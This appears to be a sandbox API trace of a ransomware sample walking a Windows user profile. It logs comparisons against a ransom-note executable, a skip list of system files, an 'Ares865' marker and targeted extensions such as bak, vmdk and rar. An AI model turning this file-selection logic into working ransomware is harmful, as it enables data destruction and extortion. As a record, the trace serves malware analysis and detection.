1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="aoldtz.exe") returned 1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2=".") returned 1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="..") returned 1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="windows") returned -1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="bootmgr") returned 1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="temp") returned -1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="pagefile.sys") returned -1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="boot") returned 1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="ids.txt") returned -1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="ntuser.dat") returned -1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="perflogs") returned -1 [0040.325] lstrcmpiW (lpString1="Cookies", lpString2="MSBuild") returned -1 [0040.325] lstrlenW (lpString="Cookies") returned 7 [0040.325] lstrlenW (lpString="C:\\Users\\Default User\\Contacts") returned 30 [0040.325] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Cookies" | out: lpString1="Cookies") returned="Cookies" [0040.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0040.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e62d0 [0040.325] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2248 | out: ListHead=0x2e77d0, ListEntry=0x2d2248) returned 0x2e7cd0 [0040.325] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="aoldtz.exe") returned 1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="bootmgr") returned 1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="temp") returned -1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="pagefile.sys") returned -1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="boot") returned 1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="ids.txt") returned -1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="ntuser.dat") returned -1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="perflogs") returned -1 [0040.325] lstrcmpiW (lpString1="Desktop", lpString2="MSBuild") returned -1 [0040.325] lstrlenW (lpString="Desktop") returned 7 [0040.326] lstrlenW (lpString="C:\\Users\\Default User\\Cookies") returned 29 [0040.326] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0040.326] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Desktop", dwFileAttributes=0x10) returned 1 [0040.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0040.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e6318 [0040.326] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2268 | out: ListHead=0x2e77d0, ListEntry=0x2d2268) returned 0x2d2248 [0040.326] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="aoldtz.exe") returned 1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="bootmgr") returned 1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="temp") returned -1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="pagefile.sys") returned -1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="boot") returned 1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="ids.txt") returned -1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="ntuser.dat") returned -1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="perflogs") returned -1 [0040.326] lstrcmpiW (lpString1="Documents", lpString2="MSBuild") returned -1 [0040.326] lstrlenW (lpString="Documents") returned 9 [0040.327] lstrlenW (lpString="C:\\Users\\Default User\\Desktop") returned 29 [0040.327] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0040.327] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Documents", dwFileAttributes=0x10) returned 1 [0040.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0040.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e6360 [0040.327] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2288 | out: ListHead=0x2e77d0, ListEntry=0x2d2288) returned 0x2d2268 [0040.327] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="aoldtz.exe") returned 1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="bootmgr") returned 1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="temp") returned -1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="pagefile.sys") returned -1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="boot") returned 1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="ids.txt") returned -1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="ntuser.dat") returned -1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="perflogs") returned -1 [0040.327] lstrcmpiW (lpString1="Downloads", lpString2="MSBuild") returned -1 [0040.327] lstrlenW (lpString="Downloads") returned 9 [0040.327] lstrlenW (lpString="C:\\Users\\Default User\\Documents") returned 31 [0040.327] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0040.327] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Downloads", dwFileAttributes=0x10) returned 1 [0040.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22a0 [0040.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e63a8 [0040.328] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d22a8 | out: ListHead=0x2e77d0, ListEntry=0x2d22a8) returned 0x2d2288 [0040.328] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="aoldtz.exe") returned 1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="bootmgr") returned 1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="temp") returned -1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="pagefile.sys") returned -1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="boot") returned 1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="ids.txt") returned -1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="ntuser.dat") returned -1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="perflogs") returned -1 [0040.328] lstrcmpiW (lpString1="Favorites", lpString2="MSBuild") returned -1 [0040.328] lstrlenW (lpString="Favorites") returned 9 [0040.328] lstrlenW (lpString="C:\\Users\\Default User\\Downloads") returned 31 [0040.328] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0040.328] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Favorites", dwFileAttributes=0x10) returned 1 [0040.345] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22e0 [0040.345] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e63f0 [0040.345] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d22e8 | out: ListHead=0x2e77d0, ListEntry=0x2d22e8) returned 0x2d22a8 [0040.345] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aeaa40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49aeaa40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.345] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.345] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="aoldtz.exe") returned 1 [0040.345] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="bootmgr") returned 1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="temp") returned -1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="pagefile.sys") returned -1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="boot") returned 1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="ids.txt") returned 1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="ntuser.dat") returned -1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="perflogs") returned -1 [0040.345] lstrcmpiW (lpString1="Links", lpString2="MSBuild") returned -1 [0040.345] lstrlenW (lpString="Links") returned 5 [0040.345] lstrlenW (lpString="C:\\Users\\Default User\\Favorites") returned 31 [0040.345] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Links" | out: lpString1="Links") returned="Links" [0040.345] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Links", dwFileAttributes=0x10) returned 1 [0040.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2320 [0040.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x38) returned 0x2ccfe8 [0040.346] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2328 | out: ListHead=0x2e77d0, ListEntry=0x2d2328) returned 0x2d22e8 [0040.346] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="aoldtz.exe") returned 1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2=".") returned 1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="..") returned 1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="windows") returned -1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="bootmgr") returned 1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="temp") returned -1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="pagefile.sys") returned -1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="boot") returned 1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="ids.txt") returned 1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="ntuser.dat") returned -1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="perflogs") returned -1 [0040.346] lstrcmpiW (lpString1="Local Settings", lpString2="MSBuild") returned -1 [0040.346] lstrlenW (lpString="Local Settings") returned 14 [0040.346] lstrlenW (lpString="C:\\Users\\Default User\\Links") returned 27 [0040.346] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Local Settings" | out: lpString1="Local Settings") returned="Local Settings" [0040.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2340 [0040.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2ed848 [0040.346] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2348 | out: ListHead=0x2e77d0, ListEntry=0x2d2348) returned 0x2d2328 [0040.346] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0040.346] lstrcmpiW (lpString1="Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.346] lstrcmpiW (lpString1="Music", lpString2="aoldtz.exe") returned 1 [0040.346] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0040.346] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0040.346] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0040.346] lstrcmpiW (lpString1="Music", lpString2="bootmgr") returned 1 [0040.346] lstrcmpiW (lpString1="Music", lpString2="temp") returned -1 [0040.347] lstrcmpiW (lpString1="Music", lpString2="pagefile.sys") returned -1 [0040.347] lstrcmpiW (lpString1="Music", lpString2="boot") returned 1 [0040.347] lstrcmpiW (lpString1="Music", lpString2="ids.txt") returned 1 [0040.347] lstrcmpiW (lpString1="Music", lpString2="ntuser.dat") returned -1 [0040.347] lstrcmpiW (lpString1="Music", lpString2="perflogs") returned -1 [0040.347] lstrcmpiW (lpString1="Music", lpString2="MSBuild") returned 1 [0040.347] lstrlenW (lpString="Music") returned 5 [0040.347] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings") returned 36 [0040.347] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Music" | out: lpString1="Music") returned="Music" [0040.347] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Music", dwFileAttributes=0x10) returned 1 [0040.347] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0040.347] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x38) returned 0x2cd028 [0040.347] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2368 | out: ListHead=0x2e77d0, ListEntry=0x2d2368) returned 0x2d2348 [0040.347] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0040.347] lstrcmpiW (lpString1="My Documents", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.347] lstrcmpiW (lpString1="My Documents", lpString2="aoldtz.exe") returned 1 [0040.347] lstrcmpiW (lpString1="My Documents", lpString2=".") returned 1 [0040.347] lstrcmpiW (lpString1="My Documents", lpString2="..") returned 1 [0040.347] lstrcmpiW (lpString1="My Documents", lpString2="windows") returned -1 [0040.347] lstrcmpiW (lpString1="My Documents", lpString2="bootmgr") returned 1 [0040.347] lstrcmpiW (lpString1="My Documents", lpString2="temp") returned -1 [0040.347] lstrcmpiW (lpString1="My Documents", lpString2="pagefile.sys") returned -1 [0040.348] lstrcmpiW (lpString1="My Documents", lpString2="boot") returned 1 [0040.348] lstrcmpiW (lpString1="My Documents", lpString2="ids.txt") returned 1 [0040.348] lstrcmpiW (lpString1="My Documents", lpString2="ntuser.dat") returned -1 [0040.348] lstrcmpiW (lpString1="My Documents", lpString2="perflogs") returned -1 [0040.348] lstrcmpiW (lpString1="My Documents", lpString2="MSBuild") returned 1 [0040.348] lstrlenW (lpString="My Documents") returned 12 [0040.348] lstrlenW (lpString="C:\\Users\\Default User\\Music") returned 27 [0040.348] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="My Documents" | out: lpString1="My Documents") returned="My Documents" [0040.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0040.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x46) returned 0x2ee920 [0040.348] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0040.348] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="aoldtz.exe") returned 1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2=".") returned 1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="..") returned 1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="windows") returned -1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="bootmgr") returned 1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="temp") returned -1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="pagefile.sys") returned -1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="boot") returned 1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="ids.txt") returned 1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="ntuser.dat") returned -1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="perflogs") returned -1 [0040.348] lstrcmpiW (lpString1="NetHood", lpString2="MSBuild") returned 1 [0040.348] lstrlenW (lpString="NetHood") returned 7 [0040.348] lstrlenW (lpString="C:\\Users\\Default User\\My Documents") returned 34 [0040.348] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="NetHood" | out: lpString1="NetHood") returned="NetHood" [0040.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0040.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e6438 [0040.348] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0040.348] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0040.348] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.348] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="aoldtz.exe") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="windows") returned -1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="bootmgr") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="temp") returned -1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="pagefile.sys") returned -1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="boot") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ids.txt") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0040.349] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xc103692e, ftCreationTime.dwHighDateTime=0x1ca0451, ftLastAccessTime.dwLowDateTime=0x1dd1880d, ftLastAccessTime.dwHighDateTime=0x1cbf8ec, ftLastWriteTime.dwLowDateTime=0x1dd1880d, ftLastWriteTime.dwHighDateTime=0x1cbf8ec, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="aoldtz.exe") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="..") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="windows") returned -1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="bootmgr") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="temp") returned -1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="pagefile.sys") returned -1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="boot") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="ids.txt") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="ntuser.dat") returned 1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="perflogs") returned -1 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="MSBuild") returned 1 [0040.349] lstrlenW (lpString="NTUSER.DAT.LOG") returned 14 [0040.349] lstrlenW (lpString="C:\\Users\\Default User\\NetHood") returned 29 [0040.349] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0040.349] lstrlenW (lpString="NTUSER.DAT.LOG") returned 14 [0040.349] lstrlenW (lpString="Ares865") returned 7 [0040.349] lstrcmpiW (lpString1="DAT.LOG", lpString2="Ares865") returned 1 [0040.349] lstrlenW (lpString=".dll") returned 4 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".dll") returned 1 [0040.349] lstrlenW (lpString=".lnk") returned 4 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".lnk") returned 1 [0040.349] lstrlenW (lpString=".ini") returned 4 [0040.349] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".ini") returned 1 [0040.350] lstrlenW (lpString=".sys") returned 4 [0040.350] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".sys") returned 1 [0040.350] lstrlenW (lpString="NTUSER.DAT.LOG") returned 14 [0040.350] lstrlenW (lpString="bak") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="bak") returned 1 [0040.350] lstrlenW (lpString="ba_") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="ba_") returned 1 [0040.350] lstrlenW (lpString="dbb") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="dbb") returned 1 [0040.350] lstrlenW (lpString="vmdk") returned 4 [0040.350] lstrcmpiW (lpString1=".LOG", lpString2="vmdk") returned -1 [0040.350] lstrlenW (lpString="rar") returned 3 [0040.350] lstrcmpiW (lpString1="LOG", lpString2="rar") returned -1 